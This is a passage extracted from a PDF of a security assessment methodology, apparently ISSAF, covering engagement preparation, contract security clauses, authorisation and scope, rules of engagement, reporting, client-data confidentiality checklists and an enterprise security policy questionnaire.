attack and forgetting to forward traffic further.
9
Guard against performing a man-in-the-middle
attack and not considering the speed of a device
which is performing the man-in-the-middle attack.
9
Generally middle man devices are slow and they
can’t give high throughput. For example a laptop.
Readiness of Infrastructure
•
The assessor should make sure the connection
for testing is up and that a backup line or
internet access is readily available before
starting the tests.
•
Ensure that due to some reason certain
protocols/services
are
not
blocked
at
the
assessment center end (Your company/ISP). It
may seriously affect you assessment results.
•
E.g. ICMP is blocked as per corporate policy
•
E.g. UDP traffic is blocked at ISP end due to
any worm. Strange but it happens some
9
time.
•
Ensure
that
your
company’s
technical
infrastructure department does not change IP
addresses of the Assessment Center without
your permission; these could negatively impact
your tests because the target firm will expecting
connections from a certain IP range.
•
•
Ensure readiness of a assessment team kit:
•
Assessment Tools / Products
•
Operating System CDs
Ensure
that
the
people
involved
in
the
assessment process properly understand the
9
client’s requirement as specified in the RFP.
•
Ensure
that
you
are
using
a
dedicated
9
Page 63 of 1123
equipment for testing. Emails and any other
administrative or personal activities should be
preformed on other machine(s) or if it's on same
machine it's recommended to do on different
boot partition. This guarantees the integrity of
the testing machine.
•
Ensure that a process is available for collecting
test results and they are presented in a proper
format. Otherwise analysis will take a lot of time
9
and important information may be missed.
•
Ensure that the testing process is closely
monitored and documented, in order to facilitate
the
identification
of
telecommunications
problems and false positives (usually the test is
recorded at network level using a protocol
9
analyzer and a different machine, in order to
avoid an impact in performance to the testing
equipment).
•
Avoid a breach in confidentiality by releasing
customer data.
•
Ensure that your storage server for test results is
secure.
•
9
9
Ensure all correspondence in appropriate way.
If you exchange asset information verbally or on a
plain paper or on phone (generally this happens
while performing onsite assessment). Later on you
don’t have any record to prove that this is what was
given for assessment by the client, just in-case if
any undesirable politics happens. This guideline can
9
be adopted at various stages in the assessment
process. Use of digital signatures and encryption for
formal electronic communication is necessary to
guarantee confidentiality, authenticity and nonrepudiation.
Page 64 of 1123
5.1 PRE-ASSESSMENT PHASE
5.1.1 Request for Proposal (RFP)
The organization shall clearly define followings:
• Name and details of person to whom proposal needs to be submitted
•
Maximum time to submit the proposal (E.g. 1st Jan 2005)
•
Maximum time to complete the assessment (e.g. March 2005)
•
High level design of network architecture to selected companies after signing NonDisclosure Agreement(NDA)
The organization shall clearly ask Assessment Company to state followings in the
proposal:
• Maximum time to complete the assessment (e.g. March 2005)
•
Expected time to complete each task
•
Serial and parallel tasks in proposal
•
Dependencies between tasks
•
Time period in which the assessment has to be completed
•
Understanding of Assessment Company’s requirement
•
Your understanding of our requirement
o
Asset segments which needs to be assessed
o
Number of Access Points and devices from where assessment has to be
performed
o
Expected deliverables
o
Clearly defied scope of assessment. Expected depth of tests in each task
(how far should the assessors go: network, O.S., application level, etc.)
o
List of objectives by which each task will be evaluated (should be effort
oriented, not success/failure oriented)
5.1.2 Evaluation of Third Party Contracts
5.1.2.1 PURPOSE OF THIRD PARTY CONTRACTS EVALUATION
In today’s highly connected world, organizations typically share business information
with a number of third parties, either out of a business imperative or to comply with
Page 65 of 1123
regulatory requirements. The sharing could be as simple as an exchange of emails or
as ‘invasive’ as providing remote access to each other’s internal systems.
An organization would typically have no control over the security management at a third
party and therefore have no control over the security of their own information. The best
an organization can do in most cases is to cover themselves legally with the appropriate
clauses in contracts with third parties.
5.1.2.2 AIM / OBJECTIVE OF THIRD PARTY CONTRACTS EVALUATION
As part of an evaluation of information systems security, contracts with third parties must
be evaluated to see if the organization is adequately covered legally.
This is also a recommendation within ISO 17799.
5.1.2.3 THIRD PARTY CONTRACT EVALUATION GUIDELINES
The roles of third-parties can be varied:
Application support and maintenance for an organization’s internal systems; Business
partner (e.g. distributor) with access to internal systems; Facilities managed service, i.e.
they host and manage the organization’s "internal" system; Business partner providing
services to the organization’s customers on behalf of the organization.
Contracts with third-parties should have clauses similar to those mentioned in this
section. Not all clauses will be suitable in all cases. And additional clauses will be
required for the specific services provided.
Existing contracts typically provide good coverage of some of the items listed in ISO
17799, such as service level agreements and intellectual property rights. This section
highlights those items that existing contracts do not typically cover.
[start of contract clauses]
Security of <Company’s> and <Company’s> Customers’ Information Assets
Page 66 of 1123
By 'information assets' is meant, without limitation, paper documents, electronic data,
servers, desktop computers, laptops, PDAs, software, network elements and mobile
telephones.
The Supplier may be given access to <Company’s> and <Company’s> customers’
information assets to allow them to fulfill their obligations under this contract.
1) The Supplier shall take all reasonable steps to protect the confidentiality, availability
and integrity of <Company’s> and <Company’s> customers’ information assets,
including but not limited to:
a) Implementing appropriate security policies and practices, consistent with the most
current version of AS/ISO 17799.
b) Complying with the <Company> Acceptable Use Policy, the current version of which
is attached in Appendix XXX. The most up-to-date version of this policy is available on
the <Company> web site.
c) Complying with all applicable privacy and cybercrime legislation.
d) <Optional> Complying with all applicable financial/health/other industry standards.
e) <Optional> Compliance with the security policies and standards attached in Appendix
XXX.
2) Upon written request, the Supplier shall provide to <Company> a copy of their
information security policy, standards, operating procedures and related documentation.
<Optional> The Supplier authorises <Company> to forward this documentation to any
<Company> customer who is supported by the Supplier.
3) Where <Company> has responsibility for maintenance of user accounts:
The
Supplier shall notify <Company> within 1 working day, if an employee, contractor or
agent of the Supplier, who has access to <Company’s> or <Company’s> customers’
information assets:
a) Leaves the employment or hire of the Supplier. If the termination happens under
unfriendly circumstances, the Supplier shall notify <Company> within 1 hour.
b) No longer requires access to <Company’s> or <Company’s> customers’ information
assets.
Page 67 of 1123
4) Where the Supplier has responsibility for maintenance of user accounts: The Supplier
shall change all relevant passwords within 1 working day, if an employee, contractor or
agent of the Supplier, who has access to <Company’s> or <Company’s> customers’
information assets:
a) Leaves the employment or hire of the Supplier. If the termination happens under
unfriendly circumstances, the Supplier shall change passwords within 1 hour.
b) No longer requires access to <Company’s> or <Company’s> customers’ information
assets.
5) Security Incidents.
A breach of security includes, but is not limited to, a loss or theft of information assets.
a) The Supplier shall notify <Company> immediately upon a confirmed, or suspected,
breach of security of <Company’s> or <Company’s> customers’ information assets. The
notification shall be to ALL of the following:
i) by telephone – <Insert the <Company> contact the Supplier uses for issue
escalation>
ii) by email - infosec@<company>.com.au
b) The Supplier shall provide all required assistance to <Company> in investigating a
breach of security.
OR
5) The Supplier shall adhere to the Information Security Incident Response Plan agreed
with <Company> and attached in Appendix XXX.
6) The Supplier shall ensure that all the Supplier’s information assets with access to
<Company’s> or <Company’s> customers’ information assets:
a) are free of viruses and other malicious software;
b) have an anti-virus tool installed, enabled and configured to use the latest signature
files provided by the anti-virus vendor.
7) The Supplier shall ensure that all employees, contractors or agents who require
access to <Company’s> or <Company’s> customers’ information assets sign a Non
Disclosure Agreement prior to being given access.
Page 68 of 1123
8) The Supplier shall ensure that all employees with access to <Company’s> or
<Company’s> customers’ information assets are provided training on the relevant
security policies and procedures prior to being given access and are provided refresher
training every year subsequently.
9) Upon written request, the Supplier shall allow <Company> to audit the Supplier's
facilities, networks, computer systems and procedures for compliance with the Supplier's
and other agreed Information Security policies and standards. <Company> may utilise a
third party to conduct the audit. Audits may include, but not be limited to, the use of
automated tools and penetration tests. <Company> shall request audits as and when
necessary, but no more than four times in any 12 month period. A minimum of 48 hours
notice shall be given prior to an audit.
10) <Optional> If the above clauses are breached:
a) <Company> reserves the right to terminate this contract, etc.
b) The Supplier shall be liable to pay penalties to <Company>, etc.
[end of contract clauses]
The following must be attached to the contract as required:
•
<Company’s> Acceptable Use Policy;
•
Security policy and standards documents;
•
An Incident Response Plan
5.1.3 Sales and Marketing
Some of the guidelines during the sales life cycle are as follows:
o
Consider the size, politics, type of industry
o
Take into account the skills and knowledge of the organization’s personnel
o
Consider the organization mission, goals and objectives for this project.
o
Consider the risks and complexity of the service required.
o
The Sales Person should understand the need for right pricing, based on the
two considerations above.
o
Sales person should understand the complete assessment cycle.
Page 69 of 1123
5.1.4 Obtain Authorization and Make sure Right People has given it
Security assessment involves performing actions very similar, if not identical, to those
carried out by an attacker. Likewise, the security test may result in the compromise of
information systems due to which classified information may be accessed during the
test. Even in the case that an agreement exists between the security assessor and the
client, the latter may not accept, for instance, that classified information may become
revealed to the security assessor.
For these reasons it is always necessary to obtain clear authorization from the customer
to perform the security assessment. Typically, approval from the customer should be
sought in such a manner that the customer assumes responsibility for the results and
side-effects (if any) of the security assessment.
It is also very important that right person has given permission to you. Obtain it from the
appropriate management / authority. It is recommended that in every company IT
department should have process to for approval.
Such approvals should be printed on company paper (letterhead) and signed by the
responsible person(s).
Reference: Security assessment agreement in appendix
5.1.5 Define the scope of work
As part of the contract or agreement between the security assessor and the client, the
scope of the work to be done must be clearly specified. Whenever possible, loose or
ambiguous definitions should be avoided.
The security assessment work will be
performed with better accuracy and its results will be more reliable when the extent of
the work is bounded.
Scope of Work
•
Define Evaluation Criteria: Evaluation criteria uses metrics based on effort. E.g. N
different automated tests + M different manual tests be performed, independently
of whether those tests result in compromising the target/ vulnerability findings or
not. All the results of tests will be submitted to client.
Page 70 of 1123
•
Define Objectives
•
Define Scope areas
•
Define “Out of Scope” areas
Both parties should define and agree on the scope of work. The scope of work should
clearly define, what should be done and what not, define timelines and dependencies of
the work for both parties. Areas which the scope of work should cover include:
•
Complete Organization
•
Specific Location(s)
•
Specific Branch(es)
•
Specific division(s)/Sub-division(s)
•
Nature of testing (intrusive / non intrusive)
•
Testing from External, Internal and or Both
•
In context with Web Presence(s)
•
o
Domain Names (DNS)
o
Server Names (Internal)
o
IP Addressing
In context with Infrastructure
o
Remote Access like Dial-up, VPN, Frame Relay etc…
o
ATM
5.1.6 Define the “Out of Scope” Areas
After going through scope of work definitions; there must be clearly defined limitations
and conditions for assessors, which he should not violate.
Some customer prefers to have testing in off hrs (nighttime) and on weekends. It helps
them to give less impact of any downtime. Off hrs testing is only good when it is being
done in the presence of client staff; to ensure that if any downtime happens then the
staff can control it and take necessary actions.
5.1.7 Sign Agreement
On the basis of above mentioned points sign a formal agreement. This written
permission, often called the rules of engagement, should include two agreements: 1.
Security Assessment Agreement and 2. Non Disclosure Agreement
Page 71 of 1123
5.1.7.1 ASSESSMENT AGREEMENT
An assessment agreement should include:
•
Scope of work
•
Out of Scope work
•
IP Addresses or ranges that needs to be assessed
•
Any specific IP addresses / subnet, host, domain that should be restricted
•
Liability for any downtime
•
Time of Completion of project and indication of any delay
•
The contract price, any additional charges, applicable penalties
•
Payment (advance and after the project)
•
Date and Time-wise schedule of assessment based on time and material or Fix bid
contract.
•
Some mechanism if testing takes more than estimated time
•
Source IP address of machines from where security assessment and test will be
conducted
•
A mechanism for dealing with false positive in order to avoid unnecessary law
enforcement
•
Contact Person(s) at the client and at your company (both phone & mobile phone
numbers as well as email addresses)
•
General Provisions
o
For delay/non payment
o
For additional labor
Reference: Security assessment agreement in appendix
5.1.7.2 NON DISCLOSURE AGREEMENT
A Non Disclosure Agreement should include followings:
•
Purpose
•
Definition
•
Non-Disclosure of Confidential Information
•
Mandatory Disclosure
•
Return of Materials
Page 72 of 1123
•
No License Granted
•
Term
•
Miscellaneous
•
Governing Law and Jurisdiction
•
Remedies
Reference: Non Disclosure agreement in appendix
5.1.8 Team Composition
Consider efficiency and accountability and compose a team of domain experts, as per
the scope of work. Security assessment can be achieve much better with specialized
team members' then having one person doing everything. Different team members bring
different set of skills together. Some team member may have skills to break into systems
but may not know firewall/IDS security assessment. Quite often it is seen, people who
are good into breaking into system are not quite good at putting test result in an
appropriate format for report and also do not like taking notes of their work.
5.1.9 Commercials
Based on the type of engagement, scope, skill set requirements and complexity of the
system, the commercials can be worked out. The type of calculation may vary for time
and material/Fixed bid model.
5.1.10 Maintain confidentiality of customer data - before start of Project
In preparation for the security assessment job, the assessor may require information
from the client in order to carry out the tests, such as network infrastructure diagrams, IP
addresses, location of customer premises, contact information for people in the
organization, existence and location of network access points, vendor of network and IT
systems, among other types of information.
This information may be confidential, and it is the security assessor's duty to ensure that
any such information handled throughout the project will be treated according to its
classification within the customer organization.
Page 73 of 1123
5.1.11
Access Point Identification
It is of paramount importance that the access points chosen for conducting a security
assessment represent all the possible threats, threat agents and possible business risk.
The choice of access points along with a good cross section sample of devices is
imperative for correct determination of threat to the facility and Information Systems.
Based on given low level network architecture design and with the help of customer
technical representatives choose the access points to represent various threat agents
such as “internet”, “operators/customers”, internal etc. Along with the threat agents, test
the network layer by layer as per the methodology. The generalized division of the
network in layers is as follows:
The above segments/components were tested from viewpoint of threat agents as “the
internet”, “administrator” and as “customer” etc…
Here we are taking a very common network architecture design and based on that we
will identify access points for testing.
5.1.11.1
LAYERED NETWORK ARCHITECTURE DESIGN
Page 74 of 1123
Switch Block
IDS
Switch Block
IDS
C
IDS
Management
Block
WAN Block
IDS
IDS
IDS
Server
Internet
IDS
Page 75 of 1123
5.1.11.1.1 ACCESS LAYER
Switch Block
Management
Block
Switch Block
WAN Block
Server
Internet Block
Key Elements to Assess
Access Points
Layer-2 Switch [Switch Block1]
Layer-2 Switch [Switch Block2]
Page 76 of 1123
5.1.11.1.2 DISTRIBUTION LAYER
Switch Block
Managemen
t Block
Server
Block
Key Elements to Assess
Switch Block
WAN
Block
Internet
Block
Access Points
Layer-2 Switch [Block1]
Layer-2 Switch [Block2]
Page 77 of 1123
5.1.11.1.3 CORE LAYER
Switch Block
Manage
ment
Server
Key Elements to Assess
Switch Block
Wan
Internet
Access Points
Layer-2 Switch [Core]
Layer-2 Switch [Core]
Page 78 of 1123
5.1.11.1.4 HIGH AVAILABILITY AND LOAD BALANCING
Key Elements to Assess
Access Points
Layer-2 Switch [Block1]
Layer-2 Switch [Block2]
Page 79 of 1123
5.1.11.1.5 MANAGEMENT BLOCK
NIDS
NIDS
HIDS
Key Elements to Assess
Access Points
Firewalls
Network based Intrusion Detection Systems
Host based intrusion Detection Systems
SYS log server
SNMP Management System
System Admin Hosts
Page 80 of 1123
5.1.11.1.6 SERVER BLOCK
NIDS
Key Elements to Assess
NIDS
Access Points
Firewalls
Network Intrusion Detection System
Host Intrusion Detection System
NTP Server
TACACS+ Server
Secure-ID Server
Certificate server
Corporate Servers
Call Manager
Page 81 of 1123
DNS Servers
E-Mail Servers
Page 82 of 1123
5.1.11.1.7 WAN BLOCK
CC
Key Elements to Assess
Access Points
Firewalls
NIDS
Crypto Clusters
Routers
Page 83 of 1123
5.1.11.1.8 INTERNET BLOCK
HIDS
NIDS
V
V
V
Key Elements to Assess
V
Access Points
Firewalls
Host Based Intrusion Detection System
Network Based Intrusion Detection System
VPN Concentrator
HTTP Server
DNS Servers
Page 84 of 1123
5.2 ASSESSMENT PHASE
5.2.1 Rules of Engagement
Establish clear rule of engagement based on the assessment scope. Covert the same in
the scope of work agreement mutually agreed and signed by client and assessment
team.
During the course of the project the customer may provide the assessor with further
information, as required by the progress of the security assessment job (network
diagrams, system parameters, applications used, access credentials, etc...).
The
assessor must be aware of the confidentiality of the information used to do the job, and
treat it as such.
Security tests may also yield information about the customer's information systems that,
while not provided directly to the assessor, may also be confidential. This includes any
vulnerability that may be found as a result of the security assessment.
Likewise, any documents, company information, personal e-mail or any other types of
computer files that the assessor may have access to as a result of a successful
penetration test, shall also be treated with confidentiality.
•
Never violate security policy
•
Never operate beyond agreement
•
Never operate beyond scope of work unless officially requested by the client (this
should be done through a signed request & approval)
•
Members of the analysis team may be present during the assessment
•
Ensure all the required approval[s] from all concern department[s] (Just in case if it is
required even after management approval) have been taken
•
Ensure all the effected department/personnel have been informed. Inform them time
of assessment and also if there are any chances of down time.
•
Vulnerability Scan
o
Ensure latest signatures are updated
o
Ensure latest signatures are tested in lab environment before using them in
production environment
Page 85 of 1123
o
Ensure automated vulnerability scanner (the current version which you are
trying to use) is not creating any kind of problem during scan (especially any
kind denial of service against target). To achieve this you can subscribe to
product and industry mailing lists and/or you can ask a question about this,
and/or you can test the product at least once before using in production
environment.
o
Use at least two automated vulnerability scanners (to prioritize manual
verification of common vulnerabilities before fiddling with false positives)
•
Vulnerability assessment tool – A vulnerability assessment tool may be software
(automated scanner which works based on a vulnerability database), a script,
customized script and/or a check-list.
o
It should check for known/unknown weaknesses and mis-configurations.
ƒ
For know vulnerabilities Common vulnerabilities and exposure (CVE)
is publicly available commonly used vulnerability database. This
database is maintained by MITRE Corporation and it’s accessible at
http://www.cve.mitre.org this vulnerability database is also not fully
sufficient. One need to maintain custom vulnerability database
ƒ
http://www.securityfocus.com/bid is also a good place to search for
vulnerabilities (and for exploits and possible solutions)
•
Perform manual verification of all vulnerabilities identified with the automated tools &
vulnerability assessment tools
•
Inform Analysis team immediately about any identified high-risk vulnerabilities and
countermeasures to safeguard them.
•
Ensure assessor’s machine security
o
Implement latest patches for Operating System and Applications installed on
it.
o
Administer assessor machine with security in mind.
o
Implement a Host based firewall, Intrusion Detection and Prevention System
on it.
•
Provide Proof of assessor machine security - Many time penetration tester / assessor
don’t apply the security patches on their machines in order to test some exploits
before firing on target organization and/or for demonstration purposes. There are
chances that these machines may be compromised by an attacker/worm and can be
used as staging host to perform further attack on target organization.
Page 86 of 1123
o
Before start of test, perform vulnerability scan by automated vulnerability
scanner on assessor machine and send it to the Project Manager and/or
client everyday.
o
Run audit script and send output to client.
o
If needed, sign a “secure system” document of the client (can be a
requirement to get access to the network)
o
Make sure Anti Virus is not deleting/quarantining/clearing exploits/tools.
Some time they just remove some part of code and as a result of this tool
doesn’t work. Have your tools/exploits repository in a separate drive and set
the antivirus not to scan the specific drive can be a good solution.
•
Record everything during the course of testing. A simple manual logging sheet can
be used for this purpose.
Record every testing activity. It will safeguard you against any consequences. Consider
the fact; what if a production server comes down during the course of testing? Your
recording and log of activities will make the incident very clear from your perspective;
otherwise any problem may be directed to you. One simplest way to do this is log all
outbound connections in your host based firewall and wipe them everyday.
•
Send weekly status report to client and/or organize one follow-up meeting.
•
Maintain sufficient record
•
It will support your findings and recommendations.
•
It will protect against un-necessary politics in which you may be accused of
unprofessional, unethical or un-authorized practices
•
•
It will act as log repository to ensure recommendations are been addressed.
Gather test information in structured order
•
Make folders as per domain name or task name
•
Give appropriate file names to test result files
Ex:..IP-Address_Tool-Name_Option_Date-Time_other,
111.222.111.222_Nmap_SYN-SCAN_020903-1530
5.2.2 Time of Assessment and Availability of Staff
•
To reduce the down time, perform active assessment during off business hrs.
Remember in this case you will not get a realistic picture of assessment. This is
recommended while performing automated probing on critical devices.
•
Make sure target organization staff is present during active assessment. It will
reduce the down time just in-case if it occurs.
Page 87 of 1123
•
ISSAF does not recommend any form of denial of service attacks (regular DoS or
distributed DoS).
5.2.3 A mechanism for dealing with false positive to avoid calling law
enforcement unnecessarily
•
Alarms should be configured in such a manner so that only appropriate person(s)
receive the warnings.
•
Before calling law enforcement, senior management permission should be taken
•
Senior management permission will even help in unnecessarily calling law
enforcement.
5.2.4 Obtain IP Addresses or ranges that needs to be assessed
•
Obtain IP Addresses or ranges (Network / Sub-network) that needs to be
assessed
•
Verify all the IP addresses (gathered through whois/dns and the received ones)
with the tested company (prevent scanning somebody else …)
•
Obtain information about any specific IP addresses / subnet, host, domain that
should be restricted
5.2.5 Assessment Centre IP Addresses
•
Inform client about Source IP address of assessment centre / machines from where
a penetration test needs to be conducted. It will help customer differentiating
legitimate security assessment attack and from illegal hacker attempt.
•
Make sure access to services from these access points is open from customer
firewall.
Add IP addresses where the tests are coming from to “white lists” if these are used (and
if black lists with automatic blocking is used) to prevent a false sense of security when
the results are presented.
5.3 POST ASSESSMENT PHASE
After the assessment phase, the analysis and report submission activity starts. Various
guidelines and best practices are suggested for various activities of this phase.
Page 88 of 1123
5.3.1 Reporting
5.3.1.1 PLANNING AND PREPARATION
Before starting the report writing process you should plan the activities for preparing and
submitting the report. A great deal of effort is required to make a good report. It really
doesn’t matter how good assessment you did if you don’t convey it to client in
appropriate format. It’s generally seen people who perform assessment doesn’t like
making report of assessment and it’s good to assign document writing part someone
who has skills and interest in it.
•
Organize the documentation based on the deliverable established.
•
Ensure reporting documentation carries data classification.
•
Ensure document control procedures are followed.
•
Show preview of the reporting structure to the client before the final document
submission.
1. team meeting
2. Responsibilities of team members
a. Team Leader
b. Assessors
c. Technical writers
3. Give appropriate data to appropriate team member
5.3.1.2 ANALYSIS
Analysis of test results shall be conducted on individual basis and with entire team (peer
review). All the results should be shared with team members. Discuss should focus on
vulnerabilities identified and verification of vulnerabilities based assessment conducted.
a. Who should perform analysis?
i. Analysis by specific team member
ii. Peer Review by another team member
iii. Final Review by Subject matter expert.
b. Objective of analysis
i. Determining current security posture of customer. It helps while
recommending safeguards.
ii. Reviewing identified vulnerabilities and countermeasures for that
iii. Removing any vulnerability if not appropriate
Page 89 of 1123
iv. Reviewing recommended countermeasures if any
v. Identifying more vulnerabilities
5.3.1.3 REPORT CREATION, MERGER AND FORMATTING
ISSAF recommends followings Structure for Report:
•
Executive Summary
o
Scope of work
o
Nature of Assessment (Internal / External)
o
Summarized Out of scope work
o
Objectives
o
Time period of work Performed
o
Summary of findings with graphical chart
o
•
ƒ
Assessment performed on number of systems/hosts
ƒ
Total vulnerable hosts
ƒ
Very-High risk vulnerabilities
ƒ
High Risk vulnerabilities
ƒ
Medium Risk vulnerabilities
ƒ
Low Risk vulnerabilities
Findings at a glance as per domain
Vulnerability Summary Review
o
o
Vulnerability summary report should include:
ƒ
Name of vulnerability
ƒ
Description of vulnerability
ƒ
Severity of vulnerability
ƒ
Effected system
ƒ
Countermeasure to Safeguard the vulnerability
As per domain/assessed component severity of vulnerability should contain
following information:
ƒ
Very-High risk vulnerabilities
ƒ
High risk vulnerabilities
ƒ
Low Risk vulnerabilities
ƒ
Informative vulnerabilities
ƒ
None
Page 90 of 1123
•
Action plan (all recommendations summarized into one table) with priorities
assigned.
•
Detailed Test Results with Countermeasures
o
Tools used
o
Date of test
o
IP address / Domain Name / Host / Device Name (as applicable)
o
Description of test
o
Tools plain output (logs)
o
Analysis/Conclusion/Observation
o
Countermeasure
5.3.1.4 FINAL REVIEW BY THE LEAD
Before sending report to client a final review shall be done by project lead and quality
assurance for the project.
5.3.1.5 CLOSING THE DOCUMENT AND SENDING IT TO CUSTOMER
•
Ensure Document control and data classification are implemented in the
document.
•
An Executive summary and a letter to client lead can be added.
5.3.2 Presentation
5.3.2.1 PRESENTATION WITH (TECHNICAL TEAM AND FUNCTION MANAGER)
•
Produce an initial summary of vulnerabilities to analysis team before presentation.
o
Send report some days in advance of presentation. It should be mutually
agreed with client as per availability of staff and convenience
o
Generally presenter should be the core person who has executed tests with
good communication skills. He should understand that analysis team has
technical and business, both kinds of people. It is his / her responsibility to
make both people aware about this
o
Review and discuss all the finding and recommendations made to safeguard.
Assessment team shall lead technical discussion
o
Have tools result with you for support while discussion
Page 91 of 1123
5.3.2.2 PRESENTATION WITH MANAGEMENT
Management presentation should carry the main summary of the assessment with
supporting reasons of why, what, when, which, where and how. It should also include
the key actions points. Presentation should include quantitative charts and tables of
summarized information. This information matches the executive summary section of the
report.
5.3.3 After Presentation
5.3.3.1.1 ACCEPTANCE CRITERIA IS MET
Ensure that the acceptance criteria are met. Refer Appendix for sample template. This
template will contain all the test cases required to perform as per ISSAF.
5.3.3.1.2 ENSURE RECOMMENDATIONS ARE BEEN ADDRESSED
Ensure recommendations are been addressed. Follow-up for reasonable assurance that
recommendations to plug the vulnerabilities is been addressed.
5.3.3.2 HELP CUSTOMER
Ensure customer is not facing any problem to safeguard against vulnerabilities. Make
sure you have answered all the questions regarding countermeasure to safeguard
customer organization. Ask customer if he needs any other help before marking the
assessment as closed since assessor may need to deploy his resources on some other
projects.
5.3.3.3 MAINTAIN CONFIDENTIALITY OF CUSTOMER DATA
All information used before and during the project will normally be used in the reports
generated to present the results of the security assessment. In order to maintain the
confidentiality of this information, all reports and additional files (such as access log files,
network traces and the like) must be kept and transmitted in a form that guarantees the
confidentiality of the information, even in the event that storage media is misplaced or
stolen.
Page 92 of 1123
Once stored, the information should be accessible on a need to know basis. The reports
may include information regarding the need to patch software, harden systems, or
establish firewalls, IDS or IPS systems.
This kind of information should be made
available only to the parties who should make infrastructure improvements following the
recommendations produced after the security test.
Compliance
Best Practices / Guidelines
Comments
(Yes/No)
Do not disclose any customer data to any person
outside the project team. If shared it must be on the
need to know basis and must not violate Non
9
Disclosure Agreement (NDA).
Protect customer data by encryption of stored files
and folders.
9
Implement Host based firewall, Intrusion detection,
Integrity check, updated Anti-Virus, latest patches
and security on the server where client’s data
9
gathered during the course of assessment is stored.
Always
use
encryption
during
electronic
transmission of client data.
9
Maintain a clear screen and clear desk policy with
power on password and screen saver password on
9
lab systems and/or system used for assessment.
Do not encourage or allow visitors, people other
than team members to the assessment area. Meet
9
visitors or other employees in conference room.
Refer client and project name by a code, don't call
them by name.
Repair and prepare assessment machine on your
own or in your presence.
9
9
Ensure assessor machine/desktop media is wiped
and cleaned before handover to other team under
9
any circumstances.
Ensure all clients related data (including CD's,
9
Page 93 of 1123
floppies, and report copies, print out containing
client data) is destroyed.
Take backup of client data in encrypted form and
store this on optical disks in fireproof safes at
Remote locations. Destroy this backup as client
9
receives required data and it is not needed
anymore.
No discussion of client assignments should be done
in public areas or under the influence of alcohol
Take customer related print outs on a secure printer
and shred the unwanted hard copies.
9
9
All customer related document including drafts must
be marked confidential and have a cover page and
9
distribution list on it
Have a policy, which defines action on violation of
customer data confidentiality.
9
Customer Information should be stored on secure
system in an encrypted manner, access controls are
applied and access to information is given on need
9
to know basis.
Customer data like reports, proposals shouldn't be
shared for business development and/or with
9
expected clients.
Never ever share your previous client information
with current employer.
Never ever share any client information in Articles,
Papers and/or in News.
Desktop/laptops should have operating system
which supports access control.
9
9
9
Page 94 of 1123
6 ENTERPRISE SECURITY POLICY
6.1 INTRODUCTION
Enterprise Information security policy states the management commitment and direction
for implementation and management of information security within the enterprise.
6.2 PRE-REQUISITE
Documented and formalized enterprise security policy, policy update schedule. Any
audit/review reports of enterprise security policy. If a copy of policy can't be obtained,
request for areas covered in policy/table of contents of policy.
6.3 OBJECTIVE
To establish whether the enterprise has formalized, implemented and communicated an
enterprise security policies, standards, procedures and guidelines within the enterprise.
6.4 ASSESSMENT QUESTIONNAIRE
This section contains a set of suggested evaluation check list that are expected to
broadly fit the ISSAF based assessment process. Recognizing that each organization
has its own unique processes, technologies and information processing architecture, it is
possible that the ISSAF evaluation may need further steps to be performed. It is also
possible that some of the suggested checks may need amplification. The assessor who
is carrying out the ISSAF based evaluation should therefore use these check lists as
guides and evolve a process that best fits the organization being reviewed.
Evaluation Check
1
2
3
4
5
5.1
Yes
No
N/A
Evaluation Performed and
Results
Does the organization have a formally
approved and documented enterprise
security policy?
Is the enterprise security policy available for
review? If not has their been any third party
review and if so is any report available for
review?
Does the organization have documented
enterprise security procedures, standards
and guidelines? And are they available for
review?
Are all concerned parties (Business
Managers/HR/Accounts/IT/Security/Legal )
involved in the formation of the security
policy ?
Does the policy include
Management Statement on information
security
Page 95 of 1123
5.2
5.3
5.4
5.5
5.6
6
6.1
6.2
6.3
6.4
6.5
6.6
6.7
6.8
6.9
7
7.1
7.2
7.3
7.4
7.5
7.6
7.7
7.8
7.9
8
8.1
8.2
8.3
9
9.1
9.2
9.3
9.4
9.5
9.6
10
Disciplinary Statement
Scope & Applicability
High Level Roles & Responsibilities
Acceptable Usage guidelines for information
systems users
Information retention policy (e.g. how long
to keep data in custody)
Does the User policy address:
Acceptable usage
E-mail Usage
Internet Usage
Encryption of Sensitive Data
Antivirus Policy
Password protection
Remote Access Policy
Incident Reporting Guidelines
Disciplinary action for non compliance
Does the administrator & other IT staff
policy address
Physical & Environmental Security
Network & Systems Security
Wireless Security
Application Development & Deployment
Internet & Third Party Connectivity
Vendor Engagement Policy
Technology standards for the organization
Technology change control
Backup & Systems Availability
Does the policy address the following areas
for business owners
Risk Assessment & Classification
Outsourced service providers engagement
Business Continuity & Disaster Recovery
Does the policy address the following areas
for security staff
Monitoring & review of systems security
events
Systems vulnerability assessment &
penetration testing
Third party engagement review
Incident response
Business Continuity Planning & Disaster
Recovery
Security Awareness & training
Is the policy communicated to the
Organization employees via trainings?
11
Does the policy go through an periodic
review and accordingly updated ?
12
Security Awareness and training for
management and end users.
Page 96 of 1123
13
13.1
13.2
Does the policy addresses concerns related
to business ethics
Is the Non disclosure agreement formally
signed by employees?
Does the compliance policy include
disciplinary actions?
6.5 ASSESSMENT QUESTIONNAIRE - NARRATIVE
The following narrative supports the understanding of the contents and logic that is
embedded in the assessment questionnaire. While the questionnaire is structured on
the basis of possible process flow that may be found in many enterprises, the narrative is
presented to aid an understanding of the concepts covered in this domain.
6.5.1 Overview
Information security policies support to implement effective security in an enterprise.
Security policies are a statements that are derived from an alignment of information
security to the business requirements, as endorsed by executive management of the
enterprise.
As it is emerging today, security policies are used as vehicles that
communicate executive management commitment to securing information assets. In
addition, these policies provide an overview of the security stance of an organization and
credibility to security activities.
While the generic reason for having a comprehensive security policy is to demonstrate
top management support to security activities and to ensure that appropriate directions
are available for implementing the controls in the context of chosen security architecture,
it is equally important from a legal perspective. When a corporation or its executive
management is sued or questioned by stakeholders in the context of safeguarding
assets (including information assets), one of the first things that would sought is to
determine if the enterprise had a security policy in place commensurate with the nature
and size of the business. This fits well into the concept of ‘due care’ that is expected of
custodians of enterprise information assets.
The creation and enforcement of an
enterprise-wide security policy would also demonstrate that management went through
the process of ‘due diligence’ and fully satisfies the ‘prudent man rule.’
It also protects
employees so long as they can fully follow the security policies and demonstrate, when
questioned, that they had adhered to what executive management expected them to do
in terms of implementing security mechanisms.
Two approaches are often seen in
Page 97 of 1123
creation and implementation of security policies: bottom up approach and top down.
The former is seen when IT departments (or a few in the department) try to create and
implement a security policy. This is frequently done through the use of technology. This
may not have the kind of visibility required or even the degree of credibility it deserves
but this is very common occurrence. In contrast, top management drives the top down
approach, which has the advantages of requisite funding, enforcement and visibility (or
awareness).
These two approaches still co-exist because IT and executive
managements don’t talk the same language; Management does not understand all the
